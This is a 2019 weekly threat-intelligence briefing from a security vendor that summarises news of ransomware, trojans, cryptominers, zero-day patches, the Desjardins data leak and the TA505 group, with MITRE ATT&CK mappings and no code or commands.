June 25, 2019
-
Anomali Threat Research
,

Weekly Threat Briefing: Millions Exposed in Desjardins Data Leak

<p>This section listed below contains summaries on various threat intelligence stories that occurred during the past week. The intelligence in this week’s iteration discuss the following threats: <b> BlueKeep</b>, <b>Cryptominers</b>, <b>FlawedAmmyy Trojan</b>, <b>Sodinokibi</b>, and <b>TA505</b>. The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><h2>Trending Threats</h2><p><a href="https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-spreads-wide-via-hacked-msps-sites-and-spam/" target="_blank"><b>Sodinokibi Ransomware Spreads Wide via Hacked MSPs, Sites and Spam</b></a> (<i>June 21, 2019</i>)<br/> In a new round of attacks, Managed Service Providers (MSPs) are being attacked to distribute “Sodinokibi” ransomware. In gaining remote access to MSPs, threat actors were able to push Sodinokibi to the endpoints using the MSPs Webroot Management Console. Once the user runs the malicious code, their files are encrypted and a ransom is demanded to unencrypt the files. In another attempt to spread the ransomware, “WinRar Italy,” was compromised so users would download Sodinokibi instead of the legitimate software. Webroot logged all customers out of their consoles and have enabled mandatory two-factor authentication in response to the attacks.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell - T1086</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a></p><p><a href="https://safebreach.com/Post/OEM-Software-Puts-Multiple-Laptops-At-Risk" target="_blank"><b>OEM Software Puts Multiple Laptops At Risk</b></a> (<i>June 21, 2019</i>)<br/> Researchers at SafeBreach Labs have identified a vulnerability in Dell’s “SupportAssist” software that is preinstalled on millions of Dell laptops and PCs to carry out health checks. The vulnerability, “CVE-2019-12280,” can allow an actor to escalate privileges and achieve persistence on an affected machine. Due to how .dll files are loaded by the software, malicious DLLs could be placed in specific directories, enabling an attacker to gain complete control of a system. SupportAssist is maintained by PC Doctor, which also provide tools for other Windows computers. This means that more computers could be at risk that are not Dell. The vulnerability was reported to Dell on April 29th by SafeBreach, with Dell reporting it to PC Doctor, who released fixes on May 28th.<br/> <a href="https://forum.anomali.com/t/oem-software-puts-multiple-laptops-at-risk/3915" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery - T1082</a></p><p><a href="https://www.bleepingcomputer.com/news/security/microsoft-warns-of-campaign-dropping-flawedammyy-rat-in-memory/" target="_blank"><b>Microsoft Warns of Campaign Dropping FlawedAmmyy RAT in Memory</b></a> (<i>June 21, 2019</i>)<br/> Microsoft have issued a warning about an active campaign targeting South Koreans with FlawedAmmyy Remote Access Trojan (RAT). FlawedAmmyy is a RAT, used frequently by threat group TA505 within spam campaigns. Using a spam email, the actors try to convince users to open an excel file that runs a Macrosoft function along with an executable in memory. This executable downloads another malware straight into the computer’s memory. The vulnerability, registered as CVE-2917-11882, was previously patched two years ago, however unpatched systems are still being targeted by threat actors.<br/> <a href="https://forum.anomali.com/t/microsoft-warns-of-campaign-dropping-flawedammyy-rat-in-memory/3916" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell - T1086</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a></p><p><a href="https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/" target="_blank"><b>LoudMiner Cryptomining Malware Targets Powerful Audio Creation PCs</b></a> (<i>June 21, 2019</i>)<br/> Researchers at ESET have identified a cryptocurrency miner, named “LoudMiner”, that uses virtual machines to run on Windows and macOS. The malware, which is based on the “XMRig” miner, is spreading through a website containing cracked (free/illegal) copies of Virtual Studio Technology (VST) software. Machines running VST software are targeted due to the high CPU usage needed to run the software, and for the malware to run without being immediately suspicious. Using a virtual machine, a Linux XMRig cryptominer is run on infected machines to steal cryptocurrency.<br/> <a href="https://forum.anomali.com/t/loudminer-cryptomining-malware-targets-powerful-audio-creation-pcs/3917" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/1260045">[MITRE PRE-ATT&amp;CK] Upload, install, and configure software/tools (PRE-T1139)</a></p><p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-botnet-arrives-through-adb-and-spreads-through-ssh/" target="_blank"><b>Cryptocurrency-Mining Botnet Malware Arrives Through ADB and Spreads Through SSH</b></a> (<i>June 20, 2019</i>)<br/> Trend Micro researchers have identified a new cryptominer botnet malware that uses open Android Debug Bridge (Android Debug Bridge) ports and spreads through SSH. As ADB doesn’t have authentication by default, the malware is able to infect the system and spread to any other system that has had an SSH connection with the host. Using the ADB command line, the payload is downloaded, with the commands deleted, along with downloaded files to remove any trace of the attack. The malware searches for known hosts to further infect more systems with the malware due to the mechanism that saves systems that have communicated through SSH as known hosts.<br/> <a href="https://forum.anomali.com/t/cryptocurrency-mining-botnet-malware-arrives-through-adb-and-spreads-through-ssh/3918" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947224">[MITRE ATT&amp;CK] Exfiltration Over Alternative Protocol - T1048</a> | <a href="https://ui.threatstream.com/ttp/947164">[MITRE ATT&amp;CK] File Deletion - T1107</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/1260045">[MITRE PRE-ATT&amp;CK] Upload, install, and configure software/tools (PRE-T1139)</a></p><p><a href="https://www.bloomberg.com/news/articles/2019-06-20/desjardins-says-2-9-million-clients-exposed-in-quebec-data-leak?" target="_blank"><b>Millions Exposed in Desjardins Data Leak</b></a> (<i>June 20, 2019</i>)<br/> In one of Canada’s largest data breaches, 2.9 million credit union members of Desjardins Group had their Personally Identifiable Information (PII) leaked. Starting in late 2018, a police investigation was launched following a suspicious transaction, which led to the police notifying Desjardins on June 14 about the extent of the breach. The leaked information, which included addresses, birthdates, banking habits, email addresses, phone numbers, names, social security numbers, was the result of an employee acting illegally. Following the leak, Desjardins conducted their own investigation that resulted in firing the employee and tightening security.<br/> <a href="https://forum.anomali.com/t/millions-exposed-in-desjardins-data-leak/3919" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259983">[MITRE PRE-ATT&amp;CK] Identify sensitive personnel information (PRE-T1051)</a></p><p><a href="https://blog.sucuri.net/2019/06/cryptomining-dropper-and-cronjob-creator.html" target="_blank"><b>Cryptomining Dropper and Cronjob Creator</b></a> (<i>June 19, 2019</i>)<br/> A cryptomining dropper malware has been reported on by Sucuri researchers after receiving information from an unknown individual who had discovered a process running on their web server. Using a Bash script on the server, threat actors are able to download the cryptominer to the victims’ systems; as of this writing, it is unknown how actors initially compromised the servers however it is likely through an unpatched vulnerability, brute force or phishing for admin credentials. The Bash script looks for any other cryptomining processes that are already running, kills any it finds, and subsequently downloads the cryptominer. The payload and configuration file are deleted to hide the miner’s presence. To gain persistence, a cron job runs every minute to checking for the Bash script, downloading and executing again if it has been removed. This enables the malware to reinfect the host when all malicious files have been removed.<br/> <a href="https://forum.anomali.com/t/cryptomining-dropper-and-cronjob-creator/3920" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force - T1110</a> | <a href="https://ui.threatstream.com/ttp/947164">[MITRE ATT&amp;CK] File Deletion - T1107</a> | <a href="https://ui.threatstream.com/ttp/1259968">[MITRE PRE-ATT&amp;CK] Host-based hiding techniques (PRE-T1091)</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a></p><p><a href="https://news.drweb.com/show/?i=13315&amp;c=9&amp;lng=en&amp;p=0" target="_blank"><b>New Node.js Trojan Threatens Gamers</b></a> (<i>June 19, 2019</i>)<br/> Researchers at Doctor Web have identified a new type of trojan written in Javascript that uses Node.js to execute itself. Using websites that post video games cheats, a 7zip file containing what the user believes are cheats is downloaded, with the trojan contained in the archive. Once the executable file is ran, the trojan is downloaded and installed, gathering system information and running a cryptocurrency miner.<br/> <a href="https://forum.anomali.com/t/new-node-js-trojan-threatens-gamers/3921" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery - T1082</a></p><p><a href="https://thehackernews.com/2019/06/mozilla-firefox-patch-update.html" target="_blank"><b>Mozilla Firefox 67.0.3 Patches Actively Exploited Zero-Day</b></a> (<i>June 19, 2019</i>)<br/> Mozilla has released two updates for its Firefox web browser to patch a critical zero-day vulnerability registered as, CVE-2019-11707. The vulnerability can be exploited by threat actors to execute code remotely to gain complete control of a vulnerable system. Actors could inject malicious code in the Javascript of a site and trick users of unpatched versions to run the code on their system.<br/> <a href="https://forum.anomali.com/t/mozilla-firefox-67-0-3-patches-actively-exploited-zero-day/3922" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947244">[MITRE ATT&amp;CK] Exploitation for Client Execution - T1203</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a></p><p><a href="https://www.zdnet.com/article/oracle-patches-another-actively-exploited-weblogic-zero-day/" target="_blank"><b>Oracle Patches Another Actively-Exploited WebLogic Zero-Day</b></a> (<i>June 19, 2019</i>)<br/> Oracle has patched a previously zero-day vulnerability in WebLogic servers. Identified as CVE-2019-2729, the vulnerability allows a threat actor to run code on a server without authentication. Similar to a recent vulnerability, CVE-2019-2725, in WebLogic, both bug exist in the deserialization process when the content is converted back to its original form from binary that can be exploited to allow for unauthenticated code execution on vulnerable systems. Threat actors are targeting corporate networks due to the high amount of installed WebLogic servers that enables them to plant crypto mining malware on the vulnerable servers.<br/> <a href="https://forum.anomali.com/t/oracle-patches-another-actively-exploited-weblogic-zero-day/3923" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a> | <a href="https://ui.threatstream.com/ttp/1260045">[MITRE PRE-ATT&amp;CK] Upload, install, and configure software/tools (PRE-T1139)</a> | <a href="https://ui.threatstream.com/ttp/947259">[MITRE ATT&amp;CK] Data Encoding - T1132</a></p><p><a href="https://www.darkreading.com/vulnerabilities---threats/dhs-tests-remote-exploit-for-bluekeep-rdp-vulnerability/d/d-id/1334986" target="_blank"><b>DHS Tests Remote Exploit for BlueKeep RDP Vulnerability</b></a> (<i>June 17, 2019</i>)<br/> The US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) announced that they have identified a Remote Code Execution (RCE) exploit for “BlueKeep,” a vulnerability affecting older versions of Windows, Windows 2000 through Windows 7. In the alert, CISA notes that Windows 2000 is vulnerable to a “wormable” attack that would spread to other vulnerable systems in a similar manner to the 2017 WannaCry attacks. Exploiting the vulnerability, an unauthenticated user can access a system remotely to install malware. Microsoft has issued patches, and warns organizations about the vulnerability due to the critical nature.<br/> <a href="https://forum.anomali.com/t/dhs-tests-remote-exploit-for-bluekeep-rdp-vulnerability/3924" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a></p><p><a href="https://www.bleepingcomputer.com/news/security/android-malware-bypasses-2fa-by-stealing-one-time-passwords/" target="_blank"><b>Android Malware Bypasses 2FA by Stealing One-Time Passwords</b></a> (<i>June 17, 2019</i>)<br/> Malware that is capable of stealing Android one-time passwords has been discovered by researchers at ESET. In an attempt to strengthen security, Google previously banned apps that access SMS and call logs when they are not necessary. However, threat actors have found a way to bypass this by accessing notifications to steal one-time passwords and two-factor authentication codes. Between June 7 and June 13, fake Turkish cryptocurrency apps were uploaded to the Google Play Store attempting to steal login credentials by requesting permissions to read all notifications. Once the permissions are accepted, the fake application phishes for the credentials with a fake login screen and prompts notifications from a specific list of apps to be collected from. In addition, the control of notifications enables threat actors to delete and silence notifications, to hide from the user.<br/> <a href="https://forum.anomali.com/t/android-malware-bypasses-2fa-by-stealing-one-time-passwords/3925" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259983">[MITRE PRE-ATT&amp;CK] Identify sensitive personnel information (PRE-T1051)</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&amp;CK] Spearphishing via Service - T1194</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a></p><h2>Observed Threats</h2><p>This section includes the top threats observed from the Anomali Community user base as well as sensors deployed by Anomali Labs. A ThreatStream account is required to view this section. <a href="https://www.anomali.com/products" target="_blank">Click here to request a trial.</a></p><p><a href="https://ui.threatstream.com/actor/26092" target="_blank">TA505</a><br/> The financially-motivated threat group called, “TA505,” was first reported on by Proofpoint researchers in December 2017.[1] Malicious activity attributed to the Russian-speaking group dates back to at least 2014, and the campaigns conducted by TA505 have targeted entities and individuals around the world. The group distributes a variety of malware, both well-known strains (Dridex banking trojan, Locky ransomware), custom-created (Jaff ransomware, tRAT), and variants of legitimate remote access tools (Remote Manipulator System). The group primarily distributes malware and tools via large scale and indiscriminately-distributed malspam campaigns, often through the “Necurs” botnet, with malicious attachments or links. Incorporation of new malware, creating custom malware and the use of advanced tactics, such as the removal of malware artifacts, indicate that this group is a sophisticated threat and likely well-funded. The group is innovative and shows the flexibility to pivot to other techniques and malware trends on a global scale.</p>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.